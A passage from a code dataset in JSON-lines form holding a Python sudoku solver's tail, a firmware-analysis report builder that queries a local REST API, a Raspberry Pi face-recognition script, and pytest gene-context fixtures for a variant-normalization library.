is_valid_sudoku(self):\n used_row = [[0] * 9 for _ in range(9)]\n used_col = [[0] * 9 for _ in range(9)]\n used_blk = [[0] * 9 for _ in range(9)]\n for row in range(9):\n for col in range(9):\n if self.board[row][col].isdigit():\n num = int(self.board[row][col]) - 1\n block = row / 3 * 3 + col / 3\n if used_row[row][num] or used_col[col][num] or used_blk[block][num]:\n return False\n used_row[row][num] = used_col[col][num] = used_blk[block][num] = 1\n return True\n\n def is_valid_num(self, row, col, num):\n blk_row = row / 3 * 3\n blk_col = col / 3 * 3\n for i in range(9):\n if self.board[i][col] == num or self.board[row][i] == num or self.board[blk_row + i / 3][blk_col + i % 3] == num:\n return False\n return True\n\n def _validation(self, row, col, num):\n if self._row_vals[row][num - 1] == 1 or self._col_vals[col][num - 1] == 1 or self._block_vals[row / 3 * 3 + col / 3][num - 1] == 1:\n return False\n return True\n\n def _backtracking(self, row=0, col=0):\n if self.board[row][col].isdigit():\n if col + 1 != 9:\n self._backtracking(row, col + 1)\n elif row + 1 != 9:\n self._backtracking(row + 1, 0)\n else:\n self.result.append(copy.deepcopy(self.board))\n else:\n for num in range(1, 10):\n if self._validation(row, col, num):\n self.board[row][col] = str(num)\n self._row_vals[row][num - 1] = self._col_vals[col][num - 1] = self._block_vals[row / 3 * 3 + col / 3][num - 1] = 1\n if col + 1 != 9:\n self._backtracking(row, col + 1)\n elif row + 1 != 9:\n self._backtracking(row + 1, 0)\n else:\n self.result.append(copy.deepcopy(self.board))\n self._row_vals[row][num - 1] = self._col_vals[col][num - 1] = self._block_vals[row / 3 * 3 + col / 3][num - 1] = 0\n self.board[row][col] = \".\"\n\n def rookie(self):\n self._row_vals = [[0] * 9 for _ in range(9)]\n self._col_vals = [[0] * 9 for _ in range(9)]\n self._block_vals = [[0] * 9 for _ in range(9)]\n for row in range(9):\n for 
col in range(9):\n if self.board[row][col].isdigit():\n index = int(self.board[row][col]) - 1\n self._row_vals[row][index] = self._col_vals[col][index] = self._block_vals[row / 3 * 3 + col / 3][index] = 1\n self._backtracking()\n\n def _recovery(self, pos, update):\n self.board[pos[0]][pos[1]] = \".\"\n for key in update:\n if key in self._vals:\n self._vals[key].append(update[key])\n else:\n self._vals[key] = update[key]\n return None\n\n def _validation2(self, pos, num, update):\n self.board[pos[0]][pos[1]] = num\n del self._vals[pos]\n for key in self._vals:\n if num in self._vals[key]:\n if key[0] == pos[0] or key[1] == pos[1] or key[0] / 3 * 3 + key[1] / 3 == pos[0] / 3 * 3 + pos[1] / 3:\n update[key] = num\n self._vals[key].remove(num)\n if len(self._vals[key]) == 0:\n return False\n return True\n\n def _backtracking2(self):\n if len(self._vals) == 0:\n self.result.append(copy.deepcopy(self.board))\n else:\n pos = min(self._vals.keys(), key=lambda x: len(self._vals[x]))\n nums = self._vals[pos]\n for num in nums:\n update = {pos: self._vals[pos]}\n if self._validation2(pos, num, update):\n self._backtracking2()\n self._recovery(pos, update)\n\n def rookie2(self):\n nums = \"123456789\"\n used_vals, self._vals = {}, {}\n for row in range(9):\n for col in range(9):\n if self.board[row][col].isdigit():\n if (\"r\", row) in used_vals:\n used_vals[(\"r\", row)].append(self.board[row][col])\n else:\n used_vals[(\"r\", row)] = [self.board[row][col]]\n if (\"c\", col) in used_vals:\n used_vals[(\"c\", col)].append(self.board[row][col])\n else:\n used_vals[(\"c\", col)] = [self.board[row][col]]\n block = row / 3 * 3 + col / 3\n if (\"b\", block) in used_vals:\n used_vals[(\"b\", block)].append(self.board[row][col])\n else:\n used_vals[(\"b\", block)] = [self.board[row][col]]\n else:\n self._vals[(row, col)] = []\n for row, col in self._vals:\n self._vals[(row, col)] = [num for num in nums\n if num not in used_vals.get((\"r\", row), [])\n and num not in used_vals.get((\"c\", col), [])\n and num not in used_vals.get((\"b\", row / 3 * 3 + col / 3), [])]\n self._backtracking2()\n\n\nif __name__ == \"__main__\":\n sudoku = [[\".\", \"2\", \"1\", \"6\", \".\", \"7\", \"8\", \"4\", \".\"],\n [\"7\", \".\", \".\", \".\", \"1\", \".\", \".\", \".\", \"3\"],\n [\"9\", \".\", \".\", \".\", \".\", \".\", \".\", \".\", \"2\"],\n [\"3\", \".\", \".\", \".\", \".\", \".\", \".\", \".\", \"8\"],\n [\"2\", \".\", \".\", \".\", \".\", \".\", \".\", \".\", \"7\"],\n [\".\", \"9\", \".\", \".\", \".\", \".\", \".\", \"6\", \".\"],\n [\".\", \".\", \"4\", \".\", \".\", \".\", \"7\", \".\", \".\"],\n [\".\", \".\", \".\", \"2\", \".\", \"1\", \".\", \".\", \".\"],\n [\".\", \".\", \".\", \".\", \"8\", \".\", \".\", \".\", \".\"]]\n start_time = timeit.default_timer()\n solver = SudokuSolver(sudoku)\n solver.board_to_entry()\n solver.sudoku2(False)\n finish_time = timeit.default_timer()\n print(finish_time - start_time)\n","sub_path":"sudoku_solver.py","file_name":"sudoku_solver.py","file_ext":"py","file_size_in_byte":13467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"607278392","text":"from modules.helperFunctions import getProgramInformationsFromJson\nfrom modules.requestFunctions import (getMetaData, getCryptoMaterialSummary, getMaterials, getHid,\n getSoftwareComponentsSummary, getFileTypeSummary,\n getIncludedFiles, getUnpacked)\nfrom modules.db import setupDB\nfrom modules.searchWhitelist import searchWithWhitelist\nfrom modules.findConfigs import 
findImportantConfigs, findConfigs\nfrom requests import get\nfrom modules.db import createTable, getProgramInformations, checkDB, insertInTable\n\n\ndef createReconJSON(tree, uid):\n    json = {}\n    db = setupDB(uid)\n    json['meta_data'] = createMetaData(tree)\n    json['crypto_material'] = createCryptoMaterial(tree)\n    json['software_components'] = createSoftwareComponents(tree, uid, db)\n\n    included_files = findIncludedFiles(tree)\n\n    json['whitelist'] = searchWithWhitelist(included_files, db)\n\n    configs = findConfigs(included_files, db)['configs']\n    json['important_configs'] = createImportantConfigs(json['whitelist'], configs)\n    remaining_configs = deleteDoubleConfigs(configs, json['important_configs'])\n\n    json['remaining_configs'] = remaining_configs\n    return json\n\n\ndef createMetaData(tree):\n    return {'device_name': getMetaData(tree, \"device_name\"),\n            'vendor': getMetaData(tree, \"vendor\"),\n            'device_class': getMetaData(tree, \"device_class\"),\n            'release_date': getMetaData(tree, \"release_date\"),\n            'version': getMetaData(tree, \"version\")}\n\n\ndef createCryptoMaterial(tree):\n    json = {}\n    for key in getCryptoMaterialSummary(tree):\n        uids = [uid for uid in tree['firmware']['analysis']['crypto_material']['summary'][key]]\n        programs = []\n        for uid in uids:\n            uid_tree = get('http://localhost:5000/rest/file_object/' + uid).json()\n            materials = getMaterials(uid_tree, key)\n            programs.append({'name': getHid(uid_tree).split(\"/\")[-1], 'uid': uid,\n                             'material': materials})\n        json[key] = programs\n    return json\n\n\ndef createSoftwareComponents(tree, uid_firmware, db):\n    json = {}\n    components = [key[0] for key in getSoftwareComponentsSummary(tree)]\n    for key in getSoftwareComponentsSummary(tree):\n        programs = []\n        if checkDB(db, components):\n            table = db.table(key)\n            for row in table:\n                programs.append(getProgramInformations(row))\n        else:\n            uids = [uid for uid in tree['firmware']['analysis']['software_components']['summary'][key]]\n            for uid in uids:\n                if uid != uid_firmware:\n                    uid_tree = get('http://localhost:5000/rest/file_object/' + uid).json()\n                    programs.append(getProgramInformationsFromJson(uid_tree, uid))\n                    table = createTable(db, key)\n                    insertInTable(table, getProgramInformationsFromJson(uid_tree, uid))\n        json[key] = programs\n    return json\n\n\ndef findIncludedFiles(tree):\n    index_filesystems = findFileSystems(tree)\n    included_files = []\n    for index in index_filesystems:\n        for file_sys in enumerate(list(getFileTypeSummary(tree).values())[index]):\n            file_system = file_sys[1]\n            file_system = get('http://localhost:5000/rest/file_object/' + file_system + '?summary=true').json()\n            for file in getIncludedFiles(file_system):\n                included_files.append(file)\n\n    if len(included_files) == 0:\n        for file in getUnpacked(tree):\n            included_files.append(file)\n    return included_files\n\n\ndef findFileSystems(tree):\n    index_filesystems = []\n    for i, key in enumerate(list(getFileTypeSummary(tree).keys())):\n        if key.count('filesystem/') > 0:\n            index_filesystems.append(i)\n    return index_filesystems\n\n\ndef createImportantConfigs(whitelist_tree, configs):\n    important_configs = []\n    for key in whitelist_tree:\n        for config in findImportantConfigs(whitelist_tree[key], configs):\n            important_configs.append(config)\n    return important_configs\n\n\ndef deleteDoubleConfigs(remaining_configs, important_configs):\n    for important_config in important_configs:\n        for i, remaining_config in enumerate(remaining_configs):\n            if remaining_config['name'] == important_config['name']:\n                remaining_configs.pop(i)\n                break  # stop after removing the match; popping while iterating would skip the next entry\n    return 
remaining_configs\n","sub_path":"modules/JSON.py","file_name":"JSON.py","file_ext":"py","file_size_in_byte":4439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"403591724","text":"import time\n\nimport cv2\nimport face_recognition as fr\nimport numpy as np\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(18, GPIO.OUT)\n\nvideo_capture = cv2.VideoCapture(-1)\n\nme_image = fr.load_image_file(\"me.jpg\")\nme_face_encoding = fr.face_encodings(me_image)[0]\n\nknown_face_encondings = [me_face_encoding]\nknown_face_names = [\"Me\"]\n\nwhile True: \n ret, frame = video_capture.read()\n frame = cv2.flip(frame, -1) #camera flip\n small_frame = cv2.resize(frame, (0, 0), fx=0.5, fy=0.5)\n rgb_frame = small_frame[:, :, ::-1]\n\n face_locations = fr.face_locations(rgb_frame)\n face_encodings = fr.face_encodings(rgb_frame, face_locations)\n\n for (top, right, bottom, left), face_encoding in zip(face_locations, face_encodings):\n\n matches = fr.compare_faces(known_face_encondings, face_encoding)\n\n name = \"Unknown\"\n\n face_distances = fr.face_distance(known_face_encondings, face_encoding)\n\n best_match_index = np.argmin(face_distances)\n if matches[best_match_index]:\n name = known_face_names[best_match_index]\n \n cv2.rectangle(frame, (left * 2, top * 2), (right * 2, bottom * 2), (0, 0, 255), 2)\n\n #cv2.rectangle(frame, (left, bottom * 4 -35), (right, bottom), (0, 0, 255), cv2.FILLED)\n \n font = cv2.FONT_HERSHEY_SIMPLEX\n GPIO.output(18, True) \n cv2.putText(frame, name, (left * 2 + 6, bottom * 2 - 6), font, 1.0, (255, 255, 255), 1) \n time.sleep(1)\n GPIO.output(18, False)\n\n cv2.imshow('Webcam_facerecognition', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n GPIO.cleanup(18)\n break\n\nvideo_capture.release()\ncv2.destroyAllWindows()\n","sub_path":"face_recog.py","file_name":"face_recog.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"607285956","text":"\"\"\"Create methods used throughout tests.\"\"\"\nimport asyncio\n\nimport pytest\nfrom ga4gh.vrsatile.pydantic.vrsatile_models import VariationDescriptor\n\nfrom variation.query import QueryHandler\n\n\n@pytest.fixture(scope=\"session\")\ndef event_loop(request):\n \"\"\"Create an instance of the default event loop for each test case.\"\"\"\n loop = asyncio.get_event_loop_policy().new_event_loop()\n yield loop\n loop.close()\n\n\n@pytest.fixture(scope=\"session\")\ndef test_query_handler():\n \"\"\"Build normalize test fixture.\"\"\"\n return QueryHandler()\n\n\n@pytest.fixture(scope=\"session\")\ndef test_cnv_handler(test_query_handler):\n \"\"\"Create test fixture for copy number variation handler\"\"\"\n return test_query_handler.to_copy_number_handler\n\n\n@pytest.fixture(scope=\"session\")\ndef vhl_gene_context():\n \"\"\"Create a VHL gene context.\"\"\"\n return {\n \"id\": \"normalize.gene:VHL\",\n \"type\": \"GeneDescriptor\",\n \"label\": \"VHL\",\n \"gene_id\": \"hgnc:12687\",\n \"xrefs\": [\n \"ncbigene:7428\",\n \"ensembl:ENSG00000134086\"\n ],\n \"alternate_labels\": [\n \"HRCA1\",\n \"VHL1\",\n \"RCA1\",\n \"pVHL\"\n ],\n \"extensions\": [\n {\n \"type\": \"Extension\",\n \"name\": \"symbol_status\",\n \"value\": \"approved\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"approved_name\",\n \"value\": \"von Hippel-Lindau tumor suppressor\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"associated_with\",\n \"value\": [\n \"ucsc:uc003bvc.4\",\n 
\"pubmed:9671762\",\n \"refseq:NM_000551\",\n \"cosmic:VHL\",\n \"omim:608537\",\n \"vega:OTTHUMG00000128668\",\n \"ccds:CCDS2598\",\n \"ena.embl:L15409\",\n \"iuphar:3204\",\n \"orphanet:120467\",\n \"ccds:CCDS2597\",\n \"uniprot:P40337\"\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.S-TtMfLdsgZPVRrWEf1-jiZMyTDCt5y1\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"3\",\n \"interval\": {\n \"end\": \"p25.3\",\n \"start\": \"p25.3\",\n \"type\": \"CytobandInterval\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VSL.NV92_npjixjlSl1kkRs9Ld8-LjLwv3sq\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.Zu7h9AggXxhTaGVsy7h_EZSChSZGcmgX\",\n \"interval\": {\n \"start\": {\"type\": \"Number\", \"value\": 10141777},\n \"end\": {\"type\": \"Number\", \"value\": 10153667},\n \"type\": \"SequenceInterval\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.S-TtMfLdsgZPVRrWEf1-jiZMyTDCt5y1\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"3\",\n \"interval\": {\n \"end\": \"p25.3\",\n \"start\": \"p25.3\",\n \"type\": \"CytobandInterval\"\n }\n },\n {\n \"_id\": \"ga4gh:VSL.NV92_npjixjlSl1kkRs9Ld8-LjLwv3sq\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.Zu7h9AggXxhTaGVsy7h_EZSChSZGcmgX\",\n \"interval\": {\n \"start\": {\"type\": \"Number\", \"value\": 10141777},\n \"end\": {\"type\": \"Number\", \"value\": 10153667},\n \"type\": \"SequenceInterval\"\n }\n }\n ]\n },\n {\n \"name\": \"previous_symbols\",\n \"value\": [\n \"RCA1\"\n ],\n \"type\": \"Extension\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locus_type\",\n \"value\": \"gene with protein product\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_gene_type\",\n \"value\": \"protein-coding\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_biotype\",\n \"value\": \"protein_coding\"\n }\n ]\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef braf_ncbi_seq_loc():\n \"\"\"Create test fixture for BRAF ncbi priority sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.xZU3kL8F6t2ca6WH_26CWKfNW9-owhR4\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.F-LrLMe1SRpfUZHkQmvkVKFEGaoDeHul\",\n \"interval\": {\n \"start\": {\"type\": \"Number\", \"value\": 140713327},\n \"end\": {\"type\": \"Number\", \"value\": 140924929},\n \"type\": \"SequenceInterval\"\n }\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef braf_gene_context(braf_ncbi_seq_loc):\n \"\"\"Create BRAF gene context test fixture.\"\"\"\n return {\n \"id\": \"normalize.gene:BRAF\",\n \"type\": \"GeneDescriptor\",\n \"label\": \"BRAF\",\n \"gene_id\": \"hgnc:1097\",\n \"xrefs\": [\n \"ncbigene:673\",\n \"ensembl:ENSG00000157764\"\n ],\n \"alternate_labels\": [\n \"BRAF1\",\n \"RAFB1\",\n \"B-raf\",\n \"B-RAF1\",\n \"NS7\",\n \"BRAF-1\"\n ],\n \"extensions\": [\n {\n \"type\": \"Extension\",\n \"name\": \"symbol_status\",\n \"value\": \"approved\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"approved_name\",\n \"value\": \"B-Raf proto-oncogene, serine/threonine kinase\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"associated_with\",\n \"value\": [\n \"ucsc:uc003vwc.5\",\n \"pubmed:1565476\",\n \"omim:164757\",\n \"vega:OTTHUMG00000157457\",\n \"ccds:CCDS5863\",\n \"iuphar:1943\",\n \"ccds:CCDS87555\",\n 
\"orphanet:119066\",\n \"refseq:NM_004333\",\n \"ena.embl:M95712\",\n \"pubmed:2284096\",\n \"uniprot:P15056\",\n \"cosmic:BRAF\"\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.O6yCQ1cnThOrTfK9YUgMlTfM6HTqbrKw\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"7\",\n \"interval\": {\n \"end\": \"q34\",\n \"start\": \"q34\",\n \"type\": \"CytobandInterval\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VSL.amNWL6i7F2nbSZAf2QLTRTujxuDrd0pR\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.F-LrLMe1SRpfUZHkQmvkVKFEGaoDeHul\",\n \"interval\": {\n \"start\": {\"type\": \"Number\", \"value\": 140719326},\n \"end\": {\"type\": \"Number\", \"value\": 140924929},\n \"type\": \"SequenceInterval\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.O6yCQ1cnThOrTfK9YUgMlTfM6HTqbrKw\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"7\",\n \"interval\": {\n \"end\": \"q34\",\n \"start\": \"q34\",\n \"type\": \"CytobandInterval\"\n }\n },\n braf_ncbi_seq_loc\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locus_type\",\n \"value\": \"gene with protein product\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_gene_type\",\n \"value\": \"protein-coding\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_biotype\",\n \"value\": \"protein_coding\"\n }\n ]\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef egfr_context():\n \"\"\"Create EGFR gene context test fixture\"\"\"\n return {\n \"id\": \"normalize.gene:EGFR\",\n \"type\": \"GeneDescriptor\",\n \"label\": \"EGFR\",\n \"gene_id\": \"hgnc:3236\",\n \"xrefs\": [\n \"ncbigene:1956\",\n \"ensembl:ENSG00000146648\"\n ],\n \"alternate_labels\": [\n \"HER1\",\n \"NISBD2\",\n \"ERBB\",\n \"PIG61\",\n \"mENA\",\n \"ERBB1\",\n \"ERRP\"\n ],\n \"extensions\": [\n {\n \"type\": \"Extension\",\n \"name\": \"symbol_status\",\n \"value\": \"approved\"\n },\n {\n \"name\": \"approved_name\",\n \"value\": \"epidermal growth factor receptor\",\n \"type\": \"Extension\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"associated_with\",\n \"value\": [\n \"ccds:CCDS5516\",\n \"ccds:CCDS5514\",\n \"iuphar:1797\",\n \"uniprot:P00533\",\n \"vega:OTTHUMG00000023661\",\n \"ucsc:uc003tqk.4\",\n \"ccds:CCDS5515\",\n \"refseq:NM_005228\",\n \"ccds:CCDS87506\",\n \"ccds:CCDS47587\",\n \"pubmed:1505215\",\n \"cosmic:EGFR\",\n \"ccds:CCDS87507\",\n \"omim:131550\",\n \"orphanet:121311\"\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.wgFi9e72ZIIJaOfLx5gaOeGrwP_IZoQ2\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"7\",\n \"interval\": {\n \"end\": \"p11.2\",\n \"start\": \"p11.2\",\n \"type\": \"CytobandInterval\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VSL.X7hBAPGdirjTLYdjgxKOmcUxaDOWVvUb\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.F-LrLMe1SRpfUZHkQmvkVKFEGaoDeHul\",\n \"interval\": {\n \"start\": {\"type\": \"Number\", \"value\": 55019016},\n \"end\": {\"type\": \"Number\", \"value\": 55211628},\n \"type\": \"SequenceInterval\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_locations\",\n \"value\": [\n {\n \"_id\": 
\"ga4gh:VCL.wgFi9e72ZIIJaOfLx5gaOeGrwP_IZoQ2\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"7\",\n \"interval\": {\n \"end\": \"p11.2\",\n \"start\": \"p11.2\",\n \"type\": \"CytobandInterval\"\n }\n },\n {\n \"_id\": \"ga4gh:VSL.X7hBAPGdirjTLYdjgxKOmcUxaDOWVvUb\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.F-LrLMe1SRpfUZHkQmvkVKFEGaoDeHul\",\n \"interval\": {\n \"start\": {\"type\": \"Number\", \"value\": 55019016},\n \"end\": {\"type\": \"Number\", \"value\": 55211628},\n \"type\": \"SequenceInterval\"\n }\n }\n ]\n },\n {\n \"name\": \"previous_symbols\",\n \"value\": [\n \"ERBB\"\n ],\n \"type\": \"Extension\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locus_type\",\n \"value\": \"gene with protein product\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_gene_type\",\n \"value\": \"protein-coding\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_biotype\",\n \"value\": \"protein_coding\"\n }\n ]\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef erbb2_context():\n \"\"\"Create test fixture for ERBB2 Gene Context.\"\"\"\n return {\n \"id\": \"normalize.gene:ERBB2\",\n \"type\": \"GeneDescriptor\",\n \"label\": \"ERBB2\",\n \"gene_id\": \"hgnc:3430\",\n \"xrefs\": [\n \"ncbigene:2064\",\n \"ensembl:ENSG00000141736\"\n ],\n \"alternate_labels\": [\n \"NGL\",\n \"CD340\",\n \"HER2\",\n \"NEU\",\n \"TKR1\",\n \"HER-2\",\n \"HER-2/neu\",\n \"VSCN2\",\n \"MLN 19\",\n \"c-ERB-2\",\n \"c-ERB2\",\n \"MLN-19\",\n \"p185(erbB2)\"\n ],\n \"extensions\": [\n {\n \"type\": \"Extension\",\n \"name\": \"symbol_status\",\n \"value\": \"approved\"\n },\n {\n \"name\": \"approved_name\",\n \"value\": \"erb-b2 receptor tyrosine kinase 2\",\n \"type\": \"Extension\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"associated_with\",\n \"value\": [\n \"ucsc:uc002hso.4\",\n \"ena.embl:X03363\",\n \"ccds:CCDS77017\",\n \"vega:OTTHUMG00000179300\",\n \"ccds:CCDS77016\",\n \"uniprot:P04626\",\n \"refseq:NM_004448\",\n \"ccds:CCDS74052\",\n \"hcdmdb:CD340\",\n \"omim:164870\",\n \"ccds:CCDS32642\",\n \"ccds:CCDS45667\",\n \"cosmic:ERBB2\",\n \"iuphar:2019\",\n \"pubmed:1675005\",\n \"pubmed:2885835\",\n \"pubmed:2903500\"\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.pS7M3aeNymozN9LKeAwVDEB5H1nt4Kqy\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"17\",\n \"interval\": {\n \"end\": \"q12\",\n \"start\": \"q12\",\n \"type\": \"CytobandInterval\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VSL.vNjrFKHvtcTYoMjyGSIRwNDTFgkr4rCW\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.dLZ15tNO1Ur0IcGjwc3Sdi_0A6Yf4zm7\",\n \"interval\": {\n \"start\": {\"type\": \"Number\", \"value\": 39687913},\n \"end\": {\"type\": \"Number\", \"value\": 39730426},\n \"type\": \"SequenceInterval\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.pS7M3aeNymozN9LKeAwVDEB5H1nt4Kqy\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"17\",\n \"interval\": {\n \"end\": \"q12\",\n \"start\": \"q12\",\n \"type\": \"CytobandInterval\"\n }\n },\n {\n \"_id\": \"ga4gh:VSL.CB10a-ECqV97KH8BtESJmsh6JA8FW4zr\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.dLZ15tNO1Ur0IcGjwc3Sdi_0A6Yf4zm7\",\n \"interval\": {\n \"start\": {\"type\": 
\"Number\", \"value\": 39688093},\n \"end\": {\"type\": \"Number\", \"value\": 39728658},\n \"type\": \"SequenceInterval\"\n }\n }\n ]\n },\n {\n \"name\": \"previous_symbols\",\n \"value\": [\n \"NGL\"\n ],\n \"type\": \"Extension\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locus_type\",\n \"value\": \"gene with protein product\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_gene_type\",\n \"value\": \"protein-coding\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_biotype\",\n \"value\": \"protein_coding\"\n }\n ]\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef prpf8_ncbi_seq_loc():\n \"\"\"Create test fixture for PRPF8 ncbi priority sequence location\"\"\"\n return {\n \"_id\": \"ga4gh:VSL.REtW8dfZCgDLEvo58qhp-dkN-hHiRtDx\",\n \"type\": \"SequenceLocation\",\n \"sequence_id\": \"ga4gh:SQ.dLZ15tNO1Ur0IcGjwc3Sdi_0A6Yf4zm7\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\"type\": \"Number\", \"value\": 1650628},\n \"end\": {\"type\": \"Number\", \"value\": 1684867}\n }\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef prpf8_gene_context(prpf8_ncbi_seq_loc):\n \"\"\"Create test fixture for PRPF8 gene context\"\"\"\n return {\n \"id\": \"normalize.gene:PRPF8\",\n \"type\": \"GeneDescriptor\",\n \"label\": \"PRPF8\",\n \"xrefs\": [\n \"ensembl:ENSG00000174231\",\n \"ncbigene:10594\"\n ],\n \"alternate_labels\": [\n \"PRPC8\",\n \"PRP8\",\n \"HPRP8\",\n \"Prp8\",\n \"RP13\",\n \"hPrp8\",\n \"SNRNP220\"\n ],\n \"extensions\": [\n {\n \"type\": \"Extension\",\n \"name\": \"symbol_status\",\n \"value\": \"approved\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"approved_name\",\n \"value\": \"pre-mRNA processing factor 8\"\n },\n {\n \"type\": \"Extension\",\n \"name\": \"hgnc_locations\",\n \"value\": [\n {\n \"type\": \"ChromosomeLocation\",\n \"_id\": \"ga4gh:VCL.GJ_KKaBnwZCC9_0vezbSxp_yAwM6R8c4\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"17\",\n \"interval\": {\n \"type\": \"CytobandInterval\",\n \"start\": \"p13.3\",\n \"end\": \"p13.3\"\n }\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ensembl_locations\",\n \"value\": [\n {\n \"sequence_id\": \"ga4gh:SQ.dLZ15tNO1Ur0IcGjwc3Sdi_0A6Yf4zm7\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\"type\": \"Number\", \"value\": 1650628},\n \"end\": {\"type\": \"Number\", \"value\": 1684867},\n },\n \"_id\": \"ga4gh:VSL.REtW8dfZCgDLEvo58qhp-dkN-hHiRtDx\",\n \"type\": \"SequenceLocation\"\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"ncbi_locations\",\n \"value\": [\n {\n \"_id\": \"ga4gh:VCL.GJ_KKaBnwZCC9_0vezbSxp_yAwM6R8c4\",\n \"type\": \"ChromosomeLocation\",\n \"species_id\": \"taxonomy:9606\",\n \"chr\": \"17\",\n \"interval\": {\n \"type\": \"CytobandInterval\",\n \"start\": \"p13.3\",\n \"end\": \"p13.3\"\n }\n },\n prpf8_ncbi_seq_loc,\n {\n \"sequence_id\": \"ga4gh:SQ.3Wx-9rRd5d7m3WxtJ_HScX3Bz1MiQWjR\",\n \"interval\": {\n \"type\": \"SequenceInterval\",\n \"start\": {\"type\": \"Number\", \"value\": 80656},\n \"end\": {\"type\": \"Number\", \"value\": 114895}\n },\n \"_id\": \"ga4gh:VSL.5FvYcab11zKZuo57GyafVqW9IykgsjAh\",\n \"type\": \"SequenceLocation\"\n }\n ]\n },\n {\n \"type\": \"Extension\",\n \"name\": \"associated_with\",\n \"value\": [\n \"pubmed:10411133\",\n \"ucsc:uc002fte.3\",\n \"pubmed:11468273\",\n \"orphanet:118066\",\n \"ccds:CCDS11010\",\n \"refseq:NM_006445\",\n 